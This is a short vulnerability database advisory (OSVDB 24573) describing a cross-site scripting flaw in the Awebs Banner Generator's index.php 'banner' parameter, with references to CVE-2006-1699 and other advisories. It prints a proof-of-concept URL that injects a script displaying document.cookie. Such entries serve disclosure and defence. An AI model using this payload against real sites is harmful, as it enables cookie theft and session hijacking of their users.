Awebs Banner Generator index.php banner Variable XSS

2006-04-07T04:47:39
ID OSVDB:24573
Type osvdb
Reporter OSVDB
Modified 2006-04-07T04:47:39

Description

Manual Testing Notes

http://[target]/banniere/index.php?mode=view&save=1&size=&text=&banner=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=&y=&font=&RGBr=&RGBg=&RGBb=&angle

References:

Vendor URL: http://aweb.eurower.net/website/wakka.php?wiki=MyScripts Security Tracker: 1015877 Secunia Advisory ID:19621 FrSIRT Advisory: ADV-2006-1348 CVE-2006-1699 Bugtraq ID: 17416